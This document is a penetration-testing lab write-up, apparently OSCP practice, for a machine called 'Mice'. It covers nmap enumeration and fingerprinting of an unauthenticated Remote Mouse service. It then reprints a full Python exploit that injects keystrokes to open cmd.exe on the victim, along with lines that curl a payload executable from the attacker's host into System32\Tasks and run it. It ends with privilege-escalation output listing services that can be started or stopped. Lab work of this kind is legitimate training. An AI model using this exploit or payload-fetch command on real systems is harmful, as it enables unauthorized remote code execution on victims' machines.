Mice
Enumeration⌗
NMAP⌗
┌──(kali㉿kali)-[~/Documents/OSCPprep/mice]
└─$ nmap 192.168.162.199 -p- -Pn -oN nmapALL.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-26 13:06 EDT
Nmap scan report for 192.168.162.199
Host is up (0.023s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
1978/tcp open unisql
1979/tcp open unisql-java
1980/tcp open pearldoc-xact
3389/tcp open ms-wbt-server
7680/tcp open pando-pub
Nmap done: 1 IP address (1 host up) scanned in 129.57 seconds
Port 1978⌗
Googling it returns a piece of software called RemoteMouse. This software appears to turn your mobile devices into a remote mouse/keyboard.
Remote Mouse has a vulnerability where used supplied input is not sanitized and allows remote commands to be passed and executed.
Also connecting to the port returns a string which can be used to fingerprint this software
┌──(kali㉿kali)-[~/Documents/OSCPprep/mice]
└─$ nc 192.168.162.199 1978
SIN 15win nop nop 300
There are two possible banners we might see when connecting to this service
SIN 15win pwd pwd 300: Indicating that the service requires authentication.SIN 15win nop nop 300: Indicating that the service does not require authentication.
From here we know the service does not require authentication
By exposing this service, the victim is essentially providing a remote keybaord to the attacker, this means we can spin up a cmd prompt on the local machine and character by character type out a command to execute.
Foothold⌗
POC⌗
We can execute commands on the target system and cause the victim to ping our IP
Code⌗
The POC for this exploit can be seen below, just click to expland. It was quite big so i wrapped it in this collapsing field.
The original POC from exploitdb just pops calc so it needed to be edited with out payload. \n characters needed to be added after each string sent to act as a user clicking ENTER.
# Exploit Title: Remote Mouse 3.008 - Failure to Authenticate
# Date: 2019-09-04
# Exploit Author: 0rphon
# Software Link: https://www.remotemouse.net/
# Version: 3.008
# Tested on: Windows 10
#Remote Mouse 3.008 fails to check for authenication and will execute any command any machine gives it
#This script pops calc as proof of concept (albeit a bit slowly)
#It also has an index of the keycodes the app uses to communicate with the computer if you want to mess around with it yourself
#!/usr/bin/python2
from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM
from time import sleep
from sys import argv
def Ping(ip):
try:
target = socket(AF_INET, SOCK_STREAM)
target.settimeout(5)
target.connect((ip, 1978))
response=target.recv(1048)
target.close()
if response=="SIN 15win nop nop 300":
return True
else: return False
except:
print("ERROR: Request timed out")
def MoveMouse(x,y,ip):
def SendMouse(command,times,ip):
for x in range(times):
target = socket(AF_INET, SOCK_DGRAM)
target.sendto(command,(ip,1978))
sleep(0.001)
if x>0:
command="mos 5m 1 0"
SendMouse(command,x,ip)
elif x<0:
x=x*-1
command="mos 5m -1 0"
SendMouse(command,x,ip)
if y>0:
command="mos 5m 0 1"
SendMouse(command,y,ip)
elif y<0:
y=y*-1
command="mos 6m 0 -1"
SendMouse(command,y,ip)
def MousePress(command,ip,action="click"):
if action=="down":
target = socket(AF_INET, SOCK_DGRAM)
target.sendto((command+" d"),(ip,1978))
elif action=="up":
target = socket(AF_INET, SOCK_DGRAM)
target.sendto((command+" u"),(ip,1978))
elif action=="click":
target = socket(AF_INET, SOCK_DGRAM)
target.sendto((command+" d"),(ip,1978))
target.sendto((command+" u"),(ip,1978))
else: raise Exception('MousePress: No action named "'+str(action)+'"')
def SendString(string,ip):
for char in string:
target = socket(AF_INET, SOCK_DGRAM)
target.sendto(characters[char],(ip,1978))
sleep(0.5)
class mouse:
leftClick="mos 5R l"
rightClick="mos 5R r"
middleClick="mos 5R m"
characters={
"A":"key 8[ras]116", "B":"key 8[ras]119", "C":"key 8[ras]118", "D":"key 8[ras]113", "E":"key 8[ras]112",
"F":"key 8[ras]115", "G":"key 8[ras]114", "H":"key 8[ras]125", "I":"key 8[ras]124", "J":"key 8[ras]127",
"K":"key 8[ras]126", "L":"key 8[ras]121", "M":"key 8[ras]120", "N":"key 8[ras]123", "O":"key 8[ras]122",
"P":"key 8[ras]101", "Q":"key 8[ras]100", "R":"key 8[ras]103", "S":"key 8[ras]102", "T":"key 7[ras]97",
"U":"key 7[ras]96", "V":"key 7[ras]99", "W":"key 7[ras]98", "X":"key 8[ras]109", "Y":"key 8[ras]108",
"Z":"key 8[ras]111",
"a":"key 7[ras]84", "b":"key 7[ras]87", "c":"key 7[ras]86", "d":"key 7[ras]81", "e":"key 7[ras]80",
"f":"key 7[ras]83", "g":"key 7[ras]82", "h":"key 7[ras]93", "i":"key 7[ras]92", "j":"key 7[ras]95",
"k":"key 7[ras]94", "l":"key 7[ras]89", "m":"key 7[ras]88", "n":"key 7[ras]91", "o":"key 7[ras]90",
"p":"key 7[ras]69", "q":"key 7[ras]68", "r":"key 7[ras]71", "s":"key 7[ras]70", "t":"key 7[ras]65",
"u":"key 7[ras]64", "v":"key 7[ras]67", "w":"key 7[ras]66", "x":"key 7[ras]77", "y":"key 7[ras]76",
"z":"key 7[ras]79",
"1":"key 6[ras]4", "2":"key 6[ras]7", "3":"key 6[ras]6", "4":"key 6[ras]1", "5":"key 6[ras]0",
"6":"key 6[ras]3", "7":"key 6[ras]2", "8":"key 7[ras]13", "9":"key 7[ras]12", "0":"key 6[ras]5",
"\n":"key 3RTN", "\b":"key 3BAS", " ":"key 7[ras]21",
"+":"key 7[ras]30", "=":"key 6[ras]8", "/":"key 7[ras]26", "_":"key 8[ras]106", "<":"key 6[ras]9",
">":"key 7[ras]11", "[":"key 8[ras]110", "]":"key 8[ras]104", "!":"key 7[ras]20", "@":"key 8[ras]117",
"#":"key 7[ras]22", "$":"key 7[ras]17", "%":"key 7[ras]16", "^":"key 8[ras]107", "&":"key 7[ras]19",
"*":"key 7[ras]31", "(":"key 7[ras]29", ")":"key 7[ras]28", "-":"key 7[ras]24", "'":"key 7[ras]18",
'"':"key 7[ras]23", ":":"key 7[ras]15", ";":"key 7[ras]14", "?":"key 7[ras]10", "`":"key 7[ras]85",
"~":"key 7[ras]75", "\\":"key 8[ras]105", "|":"key 7[ras]73", "{":"key 7[ras]78", "}":"key 7[ras]72",
",":"key 7[ras]25", ".":"key 7[ras]27"
}
def PopCalc(ip):
MoveMouse(-5000,3000,ip) <--- mouse moves to windows icon in bottom left corner
MousePress(mouse.leftClick,ip)
sleep(1)
SendString("cmd.exe",ip) <--- open cmd prompt
sleep(1)
SendString("\n",ip) <--- enter, to execute command
sleep(1)
SendString("ping -n 5 192.168.49.162",ip) <---- Commands here
sleep(1)
SendString("\n",ip)
print("SUCCESS! Process has run on target",ip)
def main():
try:
targetIP=argv[1]
except:
print("ERROR: You forgot to enter an IP! example: exploit.py 10.0.0.1")
exit()
if Ping(targetIP)==True:
PopCalc(targetIP)
else:
print("ERROR: Target machine is not running RemoteMouse")
exit()
if __name__=="__main__":
main()
SendString("curl http://192.168.49.162:80/poshx86.exe -o C:\\Windows\\System32\\Tasks\\poshx86.exe",ip)
SendString("C:\\Windows\\System32\\Tasks\\poshx86.exe",ip)
Screenshot from the victim just for fun to see how many cmd prompts were open from my attempts.
RegPath: HKLM\Software\Classes\htmlfile\shell\open\command
Folder: C:\Program Files\Internet Explorer
File: C:\Program Files\Internet Explorer\IEXPLORE.EXE %1 (Unquoted and Space detected)
LOOKS LIKE YOU CAN MODIFY OR START/STOP SOME SERVICE/s:
RmSvc: GenericExecute (Start/Stop)
wcncsvc: GenericExecute (Start/Stop)
BcastDVRUserService_5f668: GenericExecute (Start/Stop)
ConsentUxUserSvc_5f668: GenericExecute (Start/Stop)
CredentialEnrollmentManagerUserSvc_5f668: GenericExecute (Start/Stop)
DeviceAssociationBrokerSvc_5f668: GenericExecute (Start/Stop)
DevicePickerUserSvc_5f668: GenericExecute (Start/Stop)
DevicesFlowUserSvc_5f668: GenericExecute (Start/Stop)
PimIndexMaintenanceSvc_5f668: GenericExecute (Start/Stop)
PrintWorkflowUserSvc_5f668: GenericExecute (Start/Stop)
UdkUserSvc_5f668: GenericExecute (Start/Stop)
UnistoreSvc_5f668: GenericExecute (Start/Stop)
UserDataSvc_5f668: GenericExecute (Start/Stop)
WpnUserService_5f668: GenericExecute (Start/Stop)